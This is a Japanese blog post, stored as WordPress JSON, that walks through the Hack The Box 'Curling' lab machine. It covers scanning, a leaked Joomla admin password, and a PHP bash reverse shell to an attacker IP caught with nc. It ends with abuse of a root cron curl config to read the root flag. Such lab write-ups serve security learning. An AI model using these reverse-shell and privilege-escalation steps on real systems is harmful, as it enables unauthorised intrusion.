{"id":3764,"date":"2020-08-28T22:59:34","date_gmt":"2020-08-28T13:59:34","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3764"},"modified":"2020-08-30T23:30:50","modified_gmt":"2020-08-30T14:30:50","slug":"hack-the-box-curling-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3764","title":{"rendered":"Hack The Box – Curling – Walkthrough"},"content":{"rendered":"

Joomla version 3.8.8 \u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b<\/h3>\n

\"\"<\/a><\/p>\n

\r\n# nmap -A -n -F -T5 curling.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 13:40 UTC\r\nNmap scan report for curling.htb (10.10.10.150)\r\nHost is up (0.041s latency).\r\nNot shown: 98 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)\r\n|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)\r\n|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\r\n|_http-generator: Joomla! - Open Source Content Management\r\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\r\n|_http-title: Home\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\n# nmap -T4 --script vuln curling.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 13:41 UTC\r\nWarning: 10.10.10.150 giving up on port because retransmission cap hit (6).\r\nNmap scan report for curling.htb (10.10.10.150)\r\nHost is up (0.055s latency).\r\nNot shown: 991 closed ports\r\nPORT      STATE    SERVICE\r\n22\/tcp    open     ssh\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n80\/tcp    open     http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n| http-csrf:\r\n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=curling.htb\r\n|   Found the following possible CSRF vulnerabilities:\r\n|\r\n|     Path: http:\/\/curling.htb:80\/\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/component\/users\/?view=reset&amp;Itemid=101\r\n|     Form id: user-registration\r\n|     Form action: \/index.php\/component\/users\/?task=reset.request&Itemid=101\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/component\/users\/?view=reset&amp;Itemid=101\r\n|     Form id: login-form\r\n|     Form action: \/index.php\/component\/users\/?Itemid=101\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/2-uncategorised\/2-curling-you-know-its-true\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/2-uncategorised\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/2-uncategorised\/1-first-post-of-curling2018\r\n|     Form id: login-form\r\n|_    Form action: \/index.php\r\n| http-dombased-xss:\r\n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=curling.htb\r\n|   Found the following indications of potential DOM based XSS:\r\n|\r\n|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')\r\n|_    Pages: http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php\/2-uncategorised\/2-curling-you-know-its-true, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised\/1-first-post-of-curling2018\r\n| http-enum:\r\n|   \/administrator\/: Possible admin folder\r\n|   \/administrator\/index.php: Possible admin folder\r\n|   \/administrator\/manifests\/files\/joomla.xml: Joomla version 3.8.8\r\n|   \/language\/en-GB\/en-GB.xml: Joomla version 3.8.8\r\n|   \/htaccess.txt: Joomla!\r\n|   \/README.txt: Interesting, a readme.\r\n|   \/bin\/: Potentially interesting folder\r\n|   \/cache\/: Potentially interesting folder\r\n|   \/images\/: Potentially interesting folder\r\n|   \/includes\/: Potentially interesting folder\r\n|   \/libraries\/: Potentially interesting folder\r\n|   \/modules\/: Potentially interesting folder\r\n|   \/templates\/: Potentially interesting folder\r\n|_  \/tmp\/: Potentially interesting folder\r\n| http-internal-ip-disclosure:\r\n|_  Internal IP Leaked: 250\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n1352\/tcp  filtered lotusnotes\r\n2383\/tcp  filtered ms-olap4\r\n3322\/tcp  filtered active-net\r\n4003\/tcp  filtered pxc-splr-ft\r\n4550\/tcp  filtered gds-adppiw-db\r\n6059\/tcp  filtered X11:59\r\n10243\/tcp filtered unknown\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 185.92 seconds\r\n\r\n# perl nikto.pl -h http:\/\/curling.htb\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.150\r\n+ Target Hostname:    curling.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-23 13:51:36 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.29 (Ubuntu)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.43). Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.\r\n+ DEBUG HTTP verb may show server debugging information. See https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.\r\n+ OSVDB-8193: \/index.php?module=ew_filemanager&type=admin&func=manager&pathext=..\/..\/..\/etc: EW FileManager for PostNuke allows arbitrary file retrieval.\r\n+ OSVDB-3092: \/administrator\/: This might be interesting.\r\n+ OSVDB-3092: \/bin\/: This might be interesting.\r\n+ OSVDB-3092: \/includes\/: This might be interesting.\r\n+ OSVDB-3092: \/tmp\/: This might be interesting.\r\n+ OSVDB-3092: \/LICENSE.txt: License file found may identify site software.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.\r\n+ \/htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.\r\n+ \/administrator\/index.php: Admin login page\/section found.\r\n+ 8770 requests: 6 error(s) and 15 item(s) reported on remote host\r\n+ End Time:           2020-08-23 14:21:12 (GMT0) (1776 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n\r\n<\/pre>\n
\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u78ba\u8a8d\u3059\u308b<\/h3>\n
floris \u3068\u3044\u3046\u30e6\u30fc\u30b6\u304c\u3044\u305d\u3046\u306a\u3053\u3068\u304c\u308f\u304b\u308b\u3002
\n\"\"<\/a><\/p>\n
\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u78ba\u8a8d\u3059\u308b\u3068\u3001secret.txt\u304c\u898b\u3064\u304b\u308b\u3002
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
\r\n# echo Q3VybGluZzIwMTgh | base64 -d | base64 -d\r\nCurling2018!\r\n<\/pre>\n
floris\u3068\u3044\u3046\u30e6\u30fc\u30b6\u3067\u7ba1\u7406\u8005\u30da\u30fc\u30b8\u306b\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3002
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
PHP\u3092\u5b9f\u884c\u3057\u3066\u3001\u6a29\u9650\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
Sourcerer Place any code in Joomla!<\/a>\u3068\u3044\u3046\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001PHP\u304c\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u3002
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
\u4ee5\u4e0b\u5185\u5bb9\u3092Joomla\u306b\u3066\u6295\u7a3f\u3059\u308b\u3002<\/p>\n
\r\n<?php\r\nexec("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.10\/1234 0>&1'");\r\n<\/pre>\n
Kali Linux\u306b\u3066\u30b7\u30a7\u30eb\u3092\u53d6\u5f97\u3059\u308b\u3002<\/p>\n
\r\n# nc -lnvp 1234\r\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\r\nNcat: Listening on :::1234\r\nNcat: Listening on 0.0.0.0:1234\r\nNcat: Connection from 172.17.0.1.\r\nNcat: Connection from 172.17.0.1:60024.\r\nbash: cannot set terminal process group (1308): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\n\r\nwww-data@curling:\/var\/www\/html$ id\r\nid\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\nwww-data@curling:\/var\/www\/html$ cd \/home\/floris\r\ncd \/home\/floris\r\n\r\nwww-data@curling:\/home\/floris$ ls -alh\r\nls -alh\r\ntotal 44K\r\ndrwxr-xr-x 6 floris floris 4.0K May 22  2018 .\r\ndrwxr-xr-x 3 root   root   4.0K May 22  2018 ..\r\nlrwxrwxrwx 1 root   root      9 May 22  2018 .bash_history -> \/dev\/null\r\n-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc\r\ndrwx------ 2 floris floris 4.0K May 22  2018 .cache\r\ndrwx------ 3 floris floris 4.0K May 22  2018 .gnupg\r\ndrwxrwxr-x 3 floris floris 4.0K May 22  2018 .local\r\n-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile\r\ndrwxr-x--- 2 root   floris 4.0K May 22  2018 admin-area\r\n-rw-r--r-- 1 floris floris 1.1K May 22  2018 password_backup\r\n-rw-r----- 1 floris floris   33 May 22  2018 user.txt\r\n\r\nwww-data@curling:\/home\/floris$ cat password_backup\r\ncat password_backup\r\n00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..\r\n00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4\r\n00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`\r\n00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......\r\n00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..\r\n00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4\r\n00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..\r\n00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x\r\n00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1\r\n00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."\r\n000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.\r\n000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k.\/... ....)p..\r\n000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C\r\n000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..\r\n000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.\r\n000000f0: 819b bb48                                ...H\r\n<\/pre>\n
password_backup\u304b\u3089\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u8abf\u3079\u308b<\/h3>\n
\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | file -\r\n\/dev\/stdin: bzip2 compressed data, block size = 900k\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | file -\r\n\/dev\/stdin: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | file -\r\n\/dev\/stdin: bzip2 compressed data, block size = 900k\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | bzcat | file -\r\n\/dev\/stdin: POSIX tar archive (GNU)\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | bzcat\r\npassword.txt                                                                                        0000644 0000000 0000000 00000000023 13301066143 012147  0                                                                                   ustar   root                            root\r\n5d<wdCbdZu)|hChXll\r\n<\/pre>\n
SSH\u3057\u3066\u3001user.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
\r\n# ssh floris@curling.htb\r\nfloris@curling.htb's password:\r\nWelcome to Ubuntu 18.04 LTS (GNU\/Linux 4.15.0-22-generic x86_64)\r\n\r\n * Documentation:  https:\/\/help.ubuntu.com\r\n * Management:     https:\/\/landscape.canonical.com\r\n * Support:        https:\/\/ubuntu.com\/advantage\r\n\r\n  System information as of Thu Aug 27 14:40:54 UTC 2020\r\n\r\n  System load:  0.0               Processes:            167\r\n  Usage of \/:   46.2% of 9.78GB   Users logged in:      0\r\n  Memory usage: 22%               IP address for ens33: 10.10.10.150\r\n  Swap usage:   0%\r\n\r\n\r\n0 packages can be updated.\r\n0 updates are security updates.\r\n\r\n\r\nLast login: Mon May 28 17:00:48 2018 from 192.168.1.71\r\n\r\nfloris@curling:~$ id\r\nuid=1000(floris) gid=1004(floris) groups=1004(floris)\r\n\r\nfloris@curling:~$ cat user.txt\r\n65dd1df0713b40d88ead98cf11b8530b\r\n<\/pre>\n
root.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
pspy<\/a>\u3092\u5229\u7528\u3059\u308b\u3068\u3001cron\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n
\r\nfloris@curling:~$ .\/pspy64\r\npspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855\r\n\r\n\r\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\r\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\r\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\r\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\r\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\r\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592\r\n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591\r\n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591\r\n                   \u2591           \u2591 \u2591\r\n                               \u2591 \u2591\r\n\r\n...\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2708   | \/usr\/sbin\/CRON -f\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2707   | \/usr\/sbin\/CRON -f\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2712   | curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:49:02 CMD: UID=???  PID=2713   |\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2719   | \/bin\/sh -c curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2718   | \/bin\/sh -c curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2717   | sleep 1\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2716   | \/bin\/sh -c sleep 1; cat \/root\/default.txt > \/home\/floris\/admin-area\/input\r\n...\r\n<\/pre>\n
cron\u3067\u6bce\u5206\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3001input\u304ccurl\u306e\u30aa\u30d7\u30b7\u30e7\u30f3\u3067\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u305f\u3081\u3001input\u3092\u66f8\u304d\u63db\u3048\u308b\u3002<\/p>\n
\r\nfloris@curling:~\/admin-area$ echo 'url = "file:\/\/\/root\/root.txt"' > input\r\n\r\nfloris@curling:~\/admin-area$ cat input\r\nurl = "file:\/\/\/root\/root.txt"\r\n\r\nfloris@curling:~\/admin-area$ cat report\r\n82c198ab6fc5365fdc6da2ee5c26064a\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
Joomla version 3.8.8 \u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b # nmap -A -n -F -T5 curling.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-0 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3764"}],"version-history":[{"count":6,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764\/revisions"}],"predecessor-version":[{"id":3778,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764\/revisions\/3778"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}